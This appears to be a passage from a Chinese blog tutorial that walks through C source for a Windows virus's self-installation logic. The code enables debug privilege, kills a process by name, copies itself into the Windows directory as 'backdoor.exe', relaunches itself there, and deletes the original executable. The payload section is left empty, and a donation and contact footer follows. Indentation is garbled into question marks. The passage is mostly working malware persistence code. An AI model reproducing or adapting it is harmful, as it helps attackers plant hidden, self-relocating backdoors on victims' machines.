//? 調整權限
VOID DebugPrivilege()
{
??? HANDLE hToken = NULL;
???
??? BOOL bRet =OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
???
??? if ( bRet == TRUE )
??? {
??????? TOKEN_PRIVILEGES tp;
??????? tp.PrivilegeCount = 1;
???????LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
??????? tp.Privileges[0].Attributes= SE_PRIVILEGE_ENABLED;
???????AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
???????
??????? CloseHandle(hToken);
??? }
}
?
//? 獲得某進程的 PID
DWORD GetProcessId(char *szProcessName)
{
??? DWORD dwPid = 0;
??? BOOL bRet = 0;
??? PROCESSENTRY32 pe32 = { 0};
??? pe32.dwSize =sizeof(PROCESSENTRY32);
?
??? HANDLE hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
??? bRet = Process32First(hSnap,&pe32);
?
??? while ( bRet )
??? {
??????? if (strcmp(pe32.szExeFile, szProcessName) == 0 )
??????? {
??????????? break;
??????? }
??????? bRet =Process32Next(hSnap, &pe32);
??? }
?
??? dwPid =pe32.th32ProcessID;
??? return dwPid;
}
?
//? 結束某進程
VOID CloseProcess(DWORD dwPid)
{
??? HANDLE hProcess =OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
??? TerminateProcess(hProcess,0);
??? CloseHandle(hProcess);
}
?
這幾個函數完成后,我們就來根據病毒的流程來完成病毒的主體代碼,代碼如下:
int main(int argc, char **argv)
{
??? // Windows 目錄
??? char szWinDir[MAX_PATH] ={ 0 };
??? //? 當前目錄
??? char szCurrDir[MAX_PATH] ={ 0 };
?
???GetWindowsDirectory(szWinDir, MAX_PATH);
??? GetModuleFileName(NULL,szCurrDir, MAX_PATH);
?
??? //? 獲取當前的目錄
??? int ch = '\\';
??? char *pFileName =strrchr(szCurrDir, ch);
??? int nLen =strlen(szCurrDir) - strlen(pFileName);
??? szCurrDir[nLen] = NULL;
?
??? if ( strcmp(szWinDir,szCurrDir) == 0 )
??? {
??????? //? 相同目錄
??????? //? 判斷參數個數
??????? //? 根據參數個數判斷是否需要刪除原病毒文件
??????? //? 如果病毒是開機自動啟動的話,不會帶有參數
??????? printf("argc = %d\r\n", argc);
??????? if ( argc == 2 )
??????? {
??????????? ch = '\\';
??????????? pFileName =strrchr(argv[1], ch);
??????????? pFileName ++;
???????????printf("pFileName = %s \r\n", pFileName);
??????????? DWORD dwPid =GetProcessId(pFileName);
??????????? printf("dwPid= %d \r\n", dwPid);
??????????? DebugPrivilege();
???????????CloseProcess(dwPid);
??????????? pFileName =argv[1];
???????????printf("pFileName = %s \r\n", pFileName);
??????????? Sleep(3000);
???????????DeleteFile(pFileName);
??????? }
??????? else
??????? {
??????????? //? 病毒的功能代碼
??????? }
??? }
??? else
??? {
??????? //? 不同目錄,說明是第一次運行
?
??????? //? 復制自身到 windows 目錄里下
??????? strcat(szWinDir,"\\backdoor.exe");
???????GetModuleFileName(NULL, szCurrDir, MAX_PATH);
??????? CopyFile(szCurrDir,szWinDir, FALSE);
?
??????? //? 構造要運行 windows 目錄下的病毒
??????? //? 以及要傳遞的自身位置
??????? strcat(szWinDir," \"");
??????? strcat(szWinDir,szCurrDir);
??????? strcat(szWinDir,"\"");
??????? printf("%s\r\n", szWinDir);
??????? WinExec(szWinDir, SW_SHOW);
??????? Sleep(1000);
??? }
?
??? // getch() 模擬病毒的動作
??? //? 保持病毒進程不退出
??? getch();
??? return 0;
}
更多文章、技術交流、商務合作、聯系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號聯系: 360901061
您的支持是博主寫作最大的動力,如果您喜歡我的文章,感覺我的文章對您有幫助,請用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點擊下面給點支持吧,站長非常感激您!手機微信長按不能支付解決辦法:請將微信支付二維碼保存到相冊,切換到微信,然后點擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對您有幫助就好】元
